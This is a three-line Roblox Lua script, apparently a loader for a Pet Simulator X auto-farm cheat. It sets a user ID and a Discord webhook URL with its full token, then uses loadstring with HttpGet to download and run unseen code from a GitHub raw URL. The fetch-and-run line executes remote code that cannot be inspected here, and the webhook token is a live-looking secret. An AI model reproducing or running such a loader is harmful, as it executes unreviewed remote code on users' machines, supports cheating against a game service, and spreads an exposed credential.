_G.UserID =3644515610 
_G.WebHook = "https://discord.com/api/webhooks/1092245051310088202/bAswOXgKaLBmB36niwYUZ_WSwHtcdEqca-7c3SgAxxhAui-lkYvJUkMeOKfx2giLBbth"
loadstring(game:HttpGet("https://raw.githubusercontent.com/vestyx/PetSimulatorXAutoFarm/main/HasteFarm.lua", true))()
